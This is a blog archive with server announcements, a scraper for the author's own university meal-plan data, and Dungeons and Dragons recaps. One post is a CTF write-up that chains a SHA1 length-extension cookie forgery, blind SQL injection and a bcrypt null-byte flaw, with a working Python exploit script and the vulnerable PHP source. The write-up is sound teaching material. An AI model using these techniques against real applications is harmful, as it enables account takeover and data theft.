PdgnBlog

Announcement: Mastodon Server

Wed, 02 Aug 2017 16:10:00 +0000

As something of an experiment, I’ve opened up a Mastodon server for Pdgn. Signups currently require a pdgn.co email (another service I added without mentioning it!), but I might change this as time goes on. You can visit the Mastodon site at goura.pdgn.co. If you haven’t already heard of it, Mastodon is a federated social network using OStatus (like GNU Social) which presents a web interface much like TweetDeck. Give it a try! If you don’t have a pdgn.co email, ask me on IRC and I can either give you one or otherwise setup your account. Like other Pdgn services, it’s named for a genus of pigeons. Goura is the genus of crowned pigeons. Here’s a picture of a western crowned pigeon!

Announcement: Unexpected Downtime

Thu, 08 Dec 2016 21:09:00 +0000

UPDATE: As of 12:43 PM EST on December 9th 2016, Pdgn is back online.

As of 9:10 PM EST on December 8th 2016, Pdgn is currently experiencing unexpected downtime as the result of a flood of bots joining the network. We are currently unaware of the reasons underlying this attack, but are working to put software in place to prevent such attacks in the future. We apologize for any inconvenience this may have caused. If you need to reach me for any reason, I’m currently on Freenode as aatxe. Pdgn will be back as soon as possible.

Thanks for bearing with us,
Aaron Weiss

Liberating data from Blackboard Transact for fun and profit

Sat, 22 Oct 2016 18:15:00 +0000

Like a lot of other college students in the US, I attend a university that uses Blackboard Transact (or the Blackboard Transaction System, or Commerce Suite, or whatever you want to call it). Transact handles a lot of things, including building access control, meal plans, and declining-balance accounts (used for things like purchasing from vending machines and paying with your student ID). Some of this data is available through a web interface.

The goal

For this exercise, I wanted to make a graph of what times I ate. The y-axis would have the days of the week, and the x-axis would be the time at which I ate. Points would represent the use of a meal swipe in the dining hall. The task seemed simple enough. I could accomplish this sort of thing with a simple gnuplot script:

set term "png" size 1280,720
set out "usage.png"
set title "Meal plan usage" font ",16"
set yrange [7:-1]
set xrange [7:20]
set grid
set xtic 1
set ylabel "Day of week"
set xlabel "Hour of day"
plot "points.dat" using 3:1:yticlabels(2) title "Meal swipe" pt 9 ps 3

as long as I had data rows that looked like daynumber dayname hour (for example, 0 Monday 17.5 would represent 5:30PM on a Monday). Getting this data was a lot harder than I expected.

The web interface

I figured the web interface, being the only way I could access this data, would be a good start. The way meal plan usage is presented is through a paginated table (with 15 rows per page). It looks like this:

Clicking a page number causes some JavaScript to run which updates the table.

I immediately thought “oh, good, there must be some beautiful API that I can interface with.” So, I brought up Chrome’s dev tools, and watched a request.

Yeah that’s not very friendly to work with. I thought that maybe I could parse the HTML, so I looked at how the link was defined and what it called when it was clicked:

Yep okay no thanks. This is HTML injected into a page when some JavaScript is run, triggered by a link click, backed by ASP.NET. I didn’t particularly want to figure out doPostBack so I considered some other options.

CasperJS: becoming the browser

I figured this would be a good time to learn CasperJS, which is a tool that simulates a browser, backed by PhantomJS (haha, ghost puns). Essentially, in order to access transactions, I would:

log in through the university’s SSO service
grant Blackboard permission to use my account data
search for all meal plan transactions
click each page and fetch all of the data

It turns out that this is fairly easy with Casper. I ran into a few problems actually fetching the data, simply because of how awfully written this app is. Below is the code I used.

var creds = require('./creds'); // private data: username/password

var casper = require('casper').create({verbose: true});
casper.start("https://my.uah.edu"); // university SSO endpoint

var times = []; // will store meal plan usage times

casper.then(function() {
    // let's start by logging in
    this.evaluate(function(creds) {
        $('#username').val(creds.user);
        $('#password').val(creds.pass);
        $('.btn-submit').click();
    }, {creds: creds});
});

casper.thenOpen('https://eacct-uah-sp.blackboard.com/eAccounts/AccountSummary.aspx?menu=0', function() {
    // grant Blackboard permission to use our account data
    this.click("[value=Accept]");
});

casper.thenOpen("https://eacct-uah-sp.blackboard.com/eAccounts/BoardTransaction.aspx", function() {
    // search for *all* transactions
    this.evaluate(function() {
        $("#ctl00_MainContent_BeginRadDateTimePicker_dateInput").val("1/1/1999 12:00AM");
        $("#MainContent_QueryButton").click();
    });

    // wait for the page to load
    this.waitForSelector("td.NumericPages div.rgNumPart a", function() {
        // then see how many pages we have
        var pages = this.getElementsInfo("td.NumericPages div.rgNumPart a").length;

        var getPages = function(i, t) {
            // recursively fetch table pages...
            // first click the link to fetch the table
            t.evaluate(function(page) {
                var x = document.querySelectorAll("td.NumericPages div.rgNumPart a")[page]
                x.click();
            }, {page: i});

            // wait until the new table is loaded
            t.waitForSelectorTextChange(".rgWrap.rgInfoPart strong:first-child", function() {
                // then fetch every date/time of use in the table
                var data = t.evaluate(function() {
                    return $("#ctl00_MainContent_BoardTransactionsRadGrid_ctl00 tbody tr td:first-child").get().slice(1).map(function(i) { return i.innerHTML; });
                });
                data.forEach(function(i) { times.push(i); });
                // and move on to the next one
                if(i > 0) getPages(i - 1, t);
            });

        };

        // we do this in reverse order because by default the first page is
        // loaded -- this way we can reliably use waitForSelectorTextChange
        getPages(pages - 1, this);
    });
});

casper.then(function() {
    // output the data for use in later processing
    this.echo(times.join(";"))
});

casper.run();

It’s not very pretty, but given how difficult it was to interact with the page programmatically I think I did an alright job.

Processing the data

Now that we have dates and times, it’s really easy to do the rest. I used a Python script to build the data file that gnuplot needed:

from datetime import datetime
data = [datetime.strptime(i, "%m/%d/%Y %I:%M %p") for i in input().split(";")]
weekdays = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]

points = [(i.weekday(), weekdays[i.weekday()], i.hour + (i.minute / 60)) for i in data]
outpoints = ["{} {} {}".format(*i) for i in points]

with open("points.dat", "w") as f:
    f.write("\n".join(outpoints))

And from there, it was just a matter of running gnuplot to get a graph like this:

Hooray, it works!

Conclusion

Avoid interacting with Blackboard at all costs. Unless you want to make cool graphs.

TUM CTF Web 300 (f8901da0) writeup

Sun, 02 Oct 2016 18:00:00 +0000

This is my favorite problem pretty much ever. Kudos to whoever wrote it, I had a great time solving it. Anyway, here goes.

The code for the vulnerable web app can be found at the bottom of the post.

Initial thoughts

We’re given the source of a PHP script that is said to be vulnerable. Upon initial examination, it looks like you can do four things with it: login to an account, register a new account, render the flag, or dump the source. Let’s look at each of these.

This is actually a fairly normal login procedure: get a row from a SQL database that matches the username passed, log the attempt, verify the hash, and log in by setting a cookie. Finally, if the login attempt is a valid admin login, set a cookie with the flag.

There are a few interesting things about this process, namely the hash algorithm used is peculiar. In addition, an intermediate hash (or “pre-hash”) is stored as part of the record of the login attempt, and the way the session cookie is validated is vulnerable to a certain attack, which I will describe later.

The registration procedure

It’s boring, not vulnerable, and doesn’t give us a flag! However, we do need a valid user account in order to login and do anything, so this is helpful exactly once.

The flag rendering procedure

This doesn’t actually render the flag, however, it’s important later. It checks to see if the class “user” variable is set to “admin.” This parameter is set by the validate_login function, which runs on every request. It turns out that we can leak data by manipulating this variable.

The source dump procedure

We’re looking at the results of this right now :)

Taking a closer look

The validate_login function

The validate_login function is called on every request, so if there’s something interesting we can do with this script, part of it is probably in validate_login. Let’s take a look.

It turns out that validate_login is vulnerable to a hash length extension attack, which can be exploited by tools such as HashPump:

<?php
// validate
if(sha1($this->secret . '|' . $_COOKIE['u']) !== $_COOKIE['h']){
    return False;
}

Note that the secret is at the beginning of the argument to sha1, and not the end — this means that we can append arbitrary data to “u.” Because of the way this data is deserialized (see read_cookie_string), this essentially means we can set whatever data we want when the script assigns to $u:

<?php
$u = $this->read_cookie_string($_COOKIE['u']);

Well, what data might we want to set? Let’s look at the next line:

<?php
$qres = $this->msi->query('SELECT * FROM users WHERE name = '.$u['name']);

This code is vulnerable to a SQL injection attack — the “name” variable is not escaped or sanitized in any way. But, what could we possibly do with this? The result of the query is only used to set the user attribute on the application instance.

Recall that we are able to use the “flag” action to check if “user” is equal to “admin.” By setting “user” to either “admin” or something else, we can leak data, one bit at a time, from the SQL database. We can abuse this to get entire strings, one character at a time. Let’s get the first character of the admin user’s innersalt as an example:

SELECT * FROM users WHERE name = if((SELECT innersalt FROM users where (name <> 'admin') IS FALSE) LIKE BINARY '0%', 'admin', 'not_admin')

We must use <> instead of = because of the way the application deserializes the cookie. Breaking down this query, we can see that it essentially checks if admin’s innersalt matches 0%, essentially checking if the first character is a zero, returning “admin” if it is, and “not_admin” if it is not. We can retrieve this value by invoking the “flag” action. Then, we repeat until we find the correct character, then move on to the next character. Through this technique we can leak any value in its entirety from the database.

The hashing algorithm

The hashing algorithm used for storing passwords is of particular interest. It uses two salts (innersalt and outersalt), and uses a pre-hash generated with the Whirlpool algorithm. This pre-hash is then passed through bcrypt to generate the final hash stored in the database.

The flaw in this algorithm is that the Whirlpool algorithm can generate a hash that includes a null byte (\x00). It turns out that when PHP verifies or generates a bcrypt hash, it ignores everything after that null byte. That is:

<?php
$data1 = "hello\x00world";
$data2 = "hello\x00universe";
var_dump(password_verify($data1, password_hash($data2, PASSWORD_DEFAULT))); // bool(true)

Since “raw mode” is used, PHP does not hex-encode the output of the hash function when calling hash(), and so if a null byte is in data passed into password_hash, it’s incredibly easy to break. There’s a great article on this at ircmaxell’s blog that explains this vulnerability much better than I can.

For reference, here’s the code for verifying a user’s password:

<?php
$outersalt = $u['outersalt'];
$innersalt = $u['innersalt'];
$password = hash('whirlpool', $innersalt.$password, True).$outersalt;
if(password_verify($password, $u['password'])){
    // do login
}

So, what we’re interested in here is checking if:

<?php
hash('whirlpool', $innersalt.$password, True)

will contain a null byte early enough that $password is easy enough to brute force.

The login procedure actually logs this intermediate step (the $password variable above) in the database. Since we have a way of leaking data from the database, we can of course leak the first log entry, which I (correctly) assumed was an admin login. Since it might include null bytes, however, I decided it would be best to try to leak this value hex-encoded, though:

SELECT * FROM users WHERE name = if((select hex(password) from log where (name like 'admin') order by time limit 1) like '1%', 'admin', 'nope')

…and so on. We eventually see that the first six characters of the hex-encoded result are “138300”.

Putting it all together

Now that we have the inner salt and three bytes that we need to match in the result of a Whirlpool hash, we simply need to brute-force a value $password such that:

<?php
substr(hash('whirlpool', $innersalt . $password), 0, 6) == '138300';

This is trivial to do, even on a slow machine. I used the following PHP script:

<?php

function generateRandomString($length = 10) {
    $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $charactersLength = strlen($characters);
    $randomString = '';
    for ($i = 0; $i < $length; $i++) $randomString .= $characters[rand(0, $charactersLength - 1)];
    return $randomString;
}
$secret = '9KmX4h41bsdOtaew';
while(true) {
    $s = generateRandomString();
    if(substr(hash('whirlpool', $secret.$s), 0, 6) == '138300') echo $s;
}

This didn’t take much time to run, and gave me quite a few values that I could use. Any of these values works as the password for the admin user in the application. We just need to login, and then the flag is set as a cookie:

hxp{if_y0u_d0_it_thr33_t1mes_itz_secure_again}

Exploit script (to leak salt and pre-hash)

import codecs
import hashpumpy
import random
import requests
import urllib.parse

OUR_USER = "nimda"
OUR_PASS = "admin"

s = requests.Session()
s.post("http://130.211.200.153/?do=login", dict(name=OUR_USER, password=OUR_PASS))

hash = s.cookies["h"]
data = urllib.parse.unquote(s.cookies["u"])

def check_test_data(what):
    newname = "if({test}, 'admin', 'nope')".format(test=what)
    ret = "&name={} -- ".format(newname)
    print(ret)
    return ret

def run_exploit(adata):
    new_hash, new_data = hashpumpy.hashpump(hash, data, adata, 33)
    new_data = urllib.parse.quote(new_data)
    s.cookies.clear()
    s.cookies.set("h", new_hash)
    s.cookies.set("u", new_data)

    res = s.get("http://130.211.200.153/?do=flag").text

    return "._." not in res

def leak(data_getter, possiblec, start=""):
    current = start
    while not run_exploit(data_getter(current)):
        for c in possiblec:
            possible = current + c + "%"
            if run_exploit(data_getter(possible)):
                current += c
                break
        else:
            print("failed!")
            return False
        print(current)
    return current

##### leak logged password attempts

def get_log_data(what):
    logpw = "(select hex(password) from log where (name like 'admin') order by time limit 1)"
    test = "{password} like '{what}'".format(password=logpw, what=what)
    return check_test_data(test)

###### leak salt

def get_salt_data(what):
    salt = "(select innersalt from users where (name <> 'admin') is false)"
    test = "{salt} like binary '{what}'".format(salt=salt, what=what)
    return check_test_data(test)

hashmatch = leak(get_log_data, "0123456789abcdef")
innersalt = leak(get_salt_data, "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")
target = hashmatch[:6]

print(target, innersalt)

Problem source

<?php

class web_control {
    public $msi;
    public $twig;
    public $secret;
    public $user = '';

    function __construct(){

        error_reporting(E_ALL);
        ini_set('display_errors', 1);

        require_once 'Twig/Autoloader.php';
        Twig_Autoloader::register();

        //setup twig
        $loader = new Twig_Loader_Filesystem('templates');
        $this->twig = new Twig_Environment($loader, array(
            'debug' => 'true'
        ));

        //$this->twig->addExtension(new Twig_Extension_Debug());


        //set default settings
        setlocale(LC_ALL, 'de_DE.UTF8');
        date_default_timezone_set('UTC');


        $this->msi = mysqli_connect(
            'localhost',
            'task17',
            'WSnAEB4UMNwHbv7kTOLKJsAra85eXS2w',
            'task17'
        );


        if ( !$this->msi->set_charset( 'utf8' ) ) {
            printf( 'Error loading character set utf8: %s<br/>mysqli_real_escape_string() might not work proper.', $this->msi->error );
            exit();
        }


        if ( mysqli_connect_errno() ) {
            printf( "Connect failed: %s\n", mysqli_connect_error() );
            exit();
        }


        if(!file_exists('/tmp/secret')){
            exit('no secret given');
        }

        $this->secret = trim(file_get_contents('/tmp/secret'));
    }


    public function run($do){

        $this->validate_login();

        if($do === 'login'){
            $this->render_login();
        }

        if($do === 'register'){
            $this->render_register();
        }

        if($do === 'flag'){
            $this->render_flag();
        }

        if($do === 'dump'){
            echo highlight_file(__FILE__);
        }

    }

    public function render_login(){
        $result = array();

        if($_SERVER['REQUEST_METHOD'] === 'POST'){
            $result = $this->do_login($_POST['name'], $_POST['password']);
        }

        echo $this->twig->render('login.twig', array(
            'result' => $result,
            'pagetitle' => 'Login'
        ));
    }

    public function render_register(){
        $result = array();

        if($_SERVER['REQUEST_METHOD'] === 'POST'){
            $result = $this->do_register($_POST['name'], $_POST['password']);
        }

        echo $this->twig->render('register.twig', array(
            'result' => $result,
            'pagetitle' => 'Register'
        ));
    }


    public function render_flag(){
        if($this->user !== 'admin'){
            exit('._.');
        }

        #echo shell_exec("/usr/bin/get_flag");
        echo "the falg was here once but for loadbalancing reasons we put it in a cookie! :)";
    }


    private function do_login($user, $password){
        $result = array('danger', 'Login failed!');

        $q = sprintf('SELECT * FROM users WHERE name = "%s"',
            $this->msi->real_escape_string($user)
        );

        $qres = $this->msi->query($q);
        if($qres->num_rows != 1){
            return $result;
        }

        $u = $qres->fetch_assoc();

        $outersalt = $u['outersalt'];
        $innersalt = $u['innersalt'];
        $password = hash('whirlpool', $innersalt.$password, True).$outersalt;

        $this->msi->query(sprintf("INSERT INTO log VALUES ('%s', '%s', '%s', '%s', '%s')",
            $this->msi->real_escape_string($user),
            $this->msi->real_escape_string(time()),
            $this->msi->real_escape_string($outersalt),
            $this->msi->real_escape_string($innersalt),
            $this->msi->real_escape_string($password)
        ));

        if(password_verify($password, $u['password'])){
            $result = array('success', 'Login successfull!');
            $cstring = $this->write_cookie_string($u);

            setcookie('u', $cstring);
            setcookie('h', sha1($this->secret . '|' . $cstring));

            if($u['name'] === 'admin'){
                setcookie('flag', shell_exec("/usr/bin/get_flag"));
            }
        }

        return $result;
    }


    private function do_register($user, $password){
        $result = array('danger', 'Registration failed!');
        if(!(strlen(trim($user)) > 0) || !ctype_alnum($user)){
            return $result;
        }

        $outersalt = $this->generateRandomString(16);
        $innersalt = $this->generateRandomString(16);
        $password = hash('whirlpool', $innersalt.$password, True).$outersalt;
        $bc_password = password_hash($password, PASSWORD_DEFAULT);

        $q = sprintf('INSERT INTO users (`name`, `password`, `outersalt`, `innersalt`) VALUES ("%s", "%s", "%s", "%s")',
            $this->msi->real_escape_string($user),
            $this->msi->real_escape_string($bc_password),
            $outersalt,
            $innersalt
        );
        
        
        if($this->msi->query($q)){
            $result = array('success', 'Registration successfull!');
        }

        return $result;
    }


    private function validate_login(){
        if(!isset($_COOKIE['u']) || !isset($_COOKIE['h'])){
            return False;
        }

        // validate
        if(sha1($this->secret . '|' . $_COOKIE['u']) !== $_COOKIE['h']){
            return False;
        }

        $u = $this->read_cookie_string($_COOKIE['u']);
        $qres = $this->msi->query('SELECT * FROM users WHERE name = '.$u['name']);
        if($qres->num_rows != 1){
            return False;
        }

        $this->user = $u['name'];
        $this->user = $qres->fetch_assoc()['name'];
        return True;
    }


    private function write_cookie_string($data){
        if(count($data) <= 1){
            return False;
        }

        $pieces = array();
        foreach ($data as $k => $v) {
            $pieces[] = sprintf("%s=%s", $k, $v);
        }

        return implode('&', $pieces);
    }


    private function read_cookie_string($data){
        $data = explode('&', $data);
        if(count($data) <= 1){
            return False;
        }

        $pieces = array();
        foreach ($data as $k => $v) {
            $t = explode('=', $v);
            if(count($data) <= 1){
                continue;
            }

            $pieces[$t[0]] = $t[1];
        }

        return $pieces;
    }


    private function generateRandomString($length = 10) {
        $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
        $charactersLength = strlen($characters);
        $randomString = '';
        for ($i = 0; $i < $length; $i++) {
            $randomString .= $characters[rand(0, $charactersLength - 1)];
        }
        return $randomString;
    }
}


$wc = new web_control(); //höhö...

if(!isset($_GET['do'])){
    $_GET['do'] = "dump";
}

$wc->run($_GET['do']);

?>

Announcement: New European Server

Sat, 11 Jun 2016 00:05:15 +0000

It is my pleasure to announce that a new server has been added to the PdgnCo network, Turtur. Turtur is located in a data center in Frankfurt, Germany, and represents the first European server in the network. As with other servers, the address uses the name as a subdomain. You can connect directly at turtur.pdgn.co or via Hyperboria at h.turtur.pdgn.co. The server is named for the Turtur genus of pigeons, containing five species of doves native to Sub-Saharan Africa. They’re rather cute! Here is a picture of an emerald-spotted wood dove, a member of the Turtur genus.

Pdgn plays D&D: Magical Cauldron vs. The World

Fri, 03 Jul 2015 01:44:51 +0000

Previously on Pdgn plays D&D: Jackal Dating Sim

Characters: John “Battle Boar” Ionescu (cSmith), Raz (ubuntor), Dingus Magee (assface), Vanswaxle Fearless Pants (JacobEdelman), Lucifirius (Lucifirius), and Ez-Ra (The_Master)

With the jackalweres from our previous session dealt with, our party loots them of their scimitars, some rations, and one pair of pants. They then continue on their way to Aki’ba. Two days pass and the party arrives in the trading post between Karri and Aki’ba. Somewhat tired from their journey, they find themselves heading to a tavern once more to relax a bit. In the mean time, Vanswaxle decides to purchase fine venison from a far-off land for several gold pieces. The merchant explains that the venison was imported from a forest kingdom to the far-north of which he has very little knowledge. He continues explaining that the venison was kept fresh by magic and that it travelled through a great number of caravans before arriving there. Also simultaneously, Lucifirus leaves the group in the tavern to search for more information about the local political climate. He determines that the best way to go about this is to seek out the commanding officer of the Aki’ba military in charge of the trading post. When he approaches his tent in the military camp grounds, guards block his way. However, with his great charm, he’s able to convince the guards to let him past as he has urgent news for the officer.

Once inside the tent, Lucifirius is met with a fairly gregarious man who introduces himself as Col. Keenu, the officer in charge of the trading post. Lucifirius explains that he is working with a trade caravan, and is seeking advice to ensure the caravan’s safety. Col. Keenu advises him to stay to the east of the trading post. He explains that the military presence is much stronger near Aki’ba and the Enku River, and that this is the best bet to stay safe. Curious, Lucifirius asks if there have been any issues with bandits, and Keenu explains that there have been recent issues with the Mehrabya expanding beyond their borders and attacking Aki’ba caravans and military scouting parties. Lucifirius thanks Keenu for the help, and begins to leave. Before he goes, Keenu tells him that if he runs into any trouble with the military, just let them know that Col. Keenu said he was okay. Then, Lucifirius leaves and returns to the party in the tavern. Soon after, our party heads off to Aki’ba to finish their grain delivery.

On the third night of their four night journey, during Raz’s watch, an invisible creature attacks. The creature sneaks up on Raz in the night, and quickly causes serious injuries. As a result of the sudden pain, Raz screams and awakens most of the party (except for the two warlocks, Vanswaxle and Lucifirius). Reacting to the likely danger, Ez-Ra decides to use his Mage Hand to awaken the two warlocks. With the whole party awake, they then struggle to find the creature that attacked Raz. Thinking quickly, Raz throws some sand in the air that hits the creature and reveals its location. The group then unleashes a swarth of magical attacks on the enemy. During this, the monster brutally assaults Dingus, once again resulting in serious injuries. Then, in an attempt to light it on fire, Vanswaxle pours a vial of alchemist’s fire in an area, but ultimately misses, lighting the ground on fire. Without thinking, Ez-Ra casts Web on the area which immediately catches fire and harms Dingus, Vanswaxle, and the monster. Fortunately, Battle Boar is on the scene and uses prayer of healing to keep the party alive. He uses his battle pigs to flank the invisible target, helping to mark its location for the rest of the group. After a rain of further magical attacks, the monster is eventually defeated. Once killed, a column of twirling air appears in its place, floating up into the sky, and ultimately dissipating. In its place, the party finds one-hundred-and-twenty gold pieces and a small note. Vanswaxle quickly picks up the note, and reads it to the party. The note is addressed to one Lord Calmigari from a Aki’ba resident named Dr. Frank D. Weiner. Dr. Weiner writes that the attached sum of gold is to be given to the Lord in exchange for his silence about a recent blunder in Karri by spies from the Aki’ba government. After his reading of the note, Ez-Ra feels suspicious of Jacob and demands to see the note, but upon reading it, it appears to say exactly that. Putting any suspicion aside, the party heads to Aki’ba to finally complete their delivery.

Upon their arrival into the city, Dingus sets off in search of cacti and the rest of the party goes to the market district to attempt to sell their grain. However, they get immediately distracted when Ez-Ra decides to investigate the local offerings of free samples. He finds a slew of free food samples, and one sample for an unusual magical beverage. The party takes interest in this magical beverage. Ez-Ra asks the old, bearded salesman what it is, and he explains that he’s unsure as nobody has been willing to drink it. Bravely, Ez-Ra takes a sample and drinks it down. Suddenly, he is able to jump considerably higher. Disinterested, Lucifirius runs off in search of Dingus, ultimately concerned for his safety. Suspicious of his intentions, Ez-Ra trails Lucifirius until he finds Dingus. Afterward, The two head to a local tavern, and Ez-Ra meets them there. Meanwhile, Vanswaxle and Raz continued to be enthralled with the magical elixir at the stand. They take many samples, and discover that despite this, the cauldron does not deplete. They then head to the tavern in search of the rest of the group. In the tavern, Ez-Ra decides to pour a vial of the magical beverage onto the cactus. It absorbs the liquid, and a void of darkness forms in a twenty-foot radius around the cactus. Still holding it, Dingus tosses the cactus across the room at the door. The sheer cold from the void causes the door to begin to crack and then to shatter. The group decides to keep the entire cauldron and goes to the stand to try to purchase it from the merchant. Vanswaxle makes an offensive offer of three copper pieces, and the merchant tells him to go away. However, the group bands together and threatens him causing him to run away screaming in fear. They then seize the cauldron and return to the tavern. Still enthralled by the magical liquid, Dingus throws a bottle at a chair. After a few seconds, the chair contorts and letters in Common begin to appear carved within it. The text details a biography of Dr. Frank D. Weiner explaining that he’s a doctor from Mehrabya who’s working with the rebels in Aki’ba. As part of his work with the rebels, he’s operating as a double agent within the Aki’ba government. Soon after realizing this, Raz and Ez-Ra notice two men in military uniforms looking around. Afraid that the military is after them, they quickly exit the tavern when Raz and Ez-Ra then notice a wizard in military uniform approaching.

Ez-Ra uses Detect Thoughts to peer into the mind of the wizard. He learns that his name is Craig, and that he was sent to investigate some sort of magical disturbance in the marketplace. It also appeared from his immediate thoughts that it wasn’t really made clear to him what was going on. Ez-Ra also learned that Craig was very hungry (particularly, he was craving mutton) and that he much preferred the idea of eating to investigating, but did not want to risk losing his job. Curious about Craig, Ez-Ra decides to delve deeper into his mind. He discovers that Craig is arranged to be married to a princess of Aki’ba, the third in line for the throne. However, he is torn between the decision to marry the princess, or to marry his true love, a poor vagrant currently holed up in an abandoned home. The conflict is driven by a hatred of his job and a need for financial security, indicating that the smart course of action might be to marry the princess and be able to stop working altogether. However, he doesn’t know that he’ll be happy, nor that he’d be okay giving up on the woman he loves. Knowing that Craig will be aware that someone has detected his thoughts, Ez-Ra uses suggestion to convince a passerby to bring Craig some mutton from the tavern and to tell him to follow his heart. Craig takes the advice and heads into the tavern to eat more mutton. Afterward, the party heads into the desert to further investigate the effects of this volatile magical liquid.

Outside of the city, the party attempts to pour the liquid on cactuses and sand to discern its effects. The first attempt causes a cactus to begin jumping, and Ez-Ra decides to perform a magical ritual to bond with the jumping cactus and to make it his familiar. The attempts continue resulting in variations of the already witnessed effects of jumping, magic text about an individual, and a bitterly cold void of darkness. After some testing, an additional effect reveals itself to be sudden teleportation within a small area. As night draws closer and the party grows weary, they return to the city and check into a hotel. At the hotel, Vanswaxle and Lucifirius reveal themselves to be Mehrabya rebels working against the government of Aki’ba. They explain that their contacts in the city have a vested interest in taking down the government, and that they’re willing to pay handsomely if the party were to break into the palace and use the couldron to wreak havok or even destroy it entirely. With some morally opposed to the evils of the authoritarian Aki’ba government and others just interested in getting paid, the party decides to take on the task to assault the palace. Vanswaxle then reaches out to his contacts in the hopes of finding blueprints for the palace to aid in their assault. As the party’s weariness grows further, they decide to rest before they begin their work in the morning.

To be continued next session.

Pdgn plays D&D: Jackal Dating Sim

Thu, 25 Jun 2015 23:39:40 +0000

As a quick introduction, we’re running a Dungeons and Dragons, 5th Edition campaign for Pdgn. After each session, I’ll be writing a post summarizing our adventure thus far. Our party is large (currently ten people), but we anticipate that subsets of the group will participate in various sessions. So, hopefully, it won’t be too overwhelming. Each session, I’ll include a list of players and characters present.

Characters: John “Battle Boar” Ionescu (cSmith), Raz (ubuntor), Baern Lutgehr (Hyper), Vanswaxle Fearless Pants (JacobEdelman), Lucifirius (Lucifirius), and Ez-Ra (The_Master)

Our adventure is set in the desert region of Hava. A once great kingdom, Hava was weakened long ago by political turmoil, and, according to legend, a powerful beast from the Void. Modern day Hava is divided into three kingdoms, ruled from their capitals: Aki’ba, Mehgraba, and Mehrabya. In the center of the region, a powerful magical sandstorm rages, known only as the Void. Only one party has ever ventured into the Void, and little is known about its origin or nature. In recent years, the kingdom of Mehrabya has expanded its efforts to harnass the magical power of the Void. They’ve started a small colony on its edge, but little is known about their intentions. The expansive kingdom of Aki’ba has focused its efforts on resource acquisition, and trade. Its main trade partner is the kingdom of Mehrabya, one rather devoid of access to mined resources, and in constant competition with Mehgraba for its fisheries. In the southeast, there are two running mountain ranges, the Elahu and the Addin. The kingdom of Aki’ba once held undisputed control over the mountain pass, but a recent mining accident has blocked the pass. Although the kingdoms are vast, their grasps are weak, and the villages, far off from the cities, are more interested in their own survival than big city politics.

The government of Aki’ba is a powerful, authoritarian caliphate. The caliph rules by divine right, and his goals are well-known to be the reunification of Hava. They’re a traditionalistic culture, and do not welcome magic in their capital. Meanwhile, Mehgraba operates a large representative democracy with less clear motivations. Aki’ba and Mehgraba have been warring for centuries as a result of Aki’ba’s desire for reunification. Mehrabya is organized autonomously. Each settlement in the kingdom hosts biweekly meetings to determine major policy decisions, and a random member of the community is selected to manage minor (or necessarily immediate) policy decisions during the interim two weeks. Their stated goal is to use magic to enrich their own lives, and they’ve been consistently playing both sides of the war to ensure their own autonomy. Although disparate in ideology and culture in the modern age, the kingdoms are all linked by a rich shared cultural tradition dating back to an ancient legend of the great united kingdom of Hava.

As the legend has it, long ago, the entire region was unified under one sultanate known as Hava. The sultan of this great kingdom was a powerful wizard known as Jafar the Great. Amidst his rule, a powerful monster came from the Void, and sought to destroy the kingdom. In response to this immenent threat, Jafar called forth his armies to defend the kingdom. For three long years, the creature roamed the deserts, preying on innocent travellers and military scouting parties alike. Occasionally, the creature would assault villages, and burn them to the ground. As the creature destroyed villages, it continued to grow in size and power, and it became increasingly daring, drawing ever nearer to the capital. In an attempt to determine how to destroy the creature slowly but surely destroying the kingdom, Jafar assembled a party of powerful adventurers, and led them into the Void in search of answers. In all of the region’s history, this is the only time that a group has ever entered the heart of the Void. Several months passed, and they still had not returned. As fear of their death grew, galvanic opportunists jumped at the opportunity to try to seize the throne.

This dispute threw the leaderless kingdom farther into a state of political turmoil. Several months from when the dispute arose, Jafar and his party returned to Hava with nothing but a mysterious magical orb. They didn’t know what it did or how to use it, but it was the only thing they found before they grew too weary to continue. They had no time to explain however because on the day of their return, the monster struck the capital. Even larger and more powerful than before, the monster destroyed the capital with ease, even in spite of the party’s attempts to defend it. Jafar managed narrowly to escape, but the rest of his party was killed in the battle. Weak and alone, he then spent three weeks wandering the desert in search of insight into the magic orb they discovered in the Void. He visited many spiritual tribes who knew nothing of this orb, until one day, a great spirit came to him in a vision. The spirit taught him an ancient spell to use the orb, but the spell came at a great cost – it could destroy anything in an area, but it also meant destroy everything in that area – including the caster. Wracked with guilt, Jafar nevertheless felt it was his duty to save the kingdom and destroy the monster, and so, he sought it out. They found one another one fateful day, not too far from the Void, and Jafar sacrificed himself to destroy it. News spread quickly throughout the remains of the kingdom of the monster’s defeat, and of Jafar’s sacrifice, but it was mostly too late. The monster had destroyed most of the kingdom, and all that remained were three small villages near the Enku and Alela rivers. It was these three small villages that grew into the kingdoms (and capitals) of modern Hava. Little is known about the truth of this story, nor is much known about the united kingdom of Hava. Still, this story is a shared knowledge for all the Havan people, and represents what little collective unity they have left.

Our adventure begins in the Mehrabya village of Karri where two warlocks, Lucifirius and Vanswaxle have hired a rag-tag group of adventurers to help transport a large grain shipment originally from the farms of Jaffa to the city of Aki’ba. Jaffa is known for its quality grain and bakeries, and Jaffan grain is considered quite the luxury in much of Hava. They hope to fetch a pretty price for the grain on the market. Having just arrived in town from the west, our party heads immediately to the local tavern to satiate their great thirsts and to rest in preparation of further travels. While at the tavern, a mischievous Ez-Ra plays a prank on Vanswaxle, casting a spell to make the air sour. However, acknowledging his own tendency to misperceive, Vanswaxle ignores the taste. A caring dwarf, Baern sees it upon himself to give a group hug to three lonesome men sitting at the bar in the middle of the day. Meanwhile, tired of the bar’s quietness, Vanswaxle goes outside to use magic to convince passerbys to join the party in tavern revelry. He’s successful in his attempts, and a large crowd fills the tavern. The group drinks plenty of water for their health, and, of course, Baern manages to get a bit tipsy from mead. Pressed for time on their delivery, the group quickly scrounges together supplies to continue their travels and heads out east toward a minor trading post.

